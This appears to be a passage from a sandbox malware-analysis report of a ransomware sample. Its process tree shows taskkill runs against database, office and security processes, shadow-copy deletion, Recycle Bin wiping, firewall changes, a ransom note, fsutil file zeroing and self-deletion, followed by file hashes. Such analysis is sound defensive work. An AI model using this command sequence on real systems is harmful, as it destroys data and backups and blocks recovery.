C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:292
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:1348
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:728
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:956
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1068
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:892
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
PID:1472
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2032
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1904
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe2⤵
- Deletes itself
PID:916 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:972
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
22KB
MD5c09e7c742e3531ba4c982b035ef6e994
SHA19fbae0889aa69c457a70da69b58aee327fd1c9cc
SHA2565595fdf90977d8d5d34aa7cd47395e9b9292a425f4a6824d1586c2d120cfc6e0
SHA5126e7e789827184c1613d0dfc2397b78d8525ad72631af7d80b1b7d06eac9f06ecebbb2705a578f30dbc162d12def1b74fddcf104cfaab9f9d2e0475cab31f9051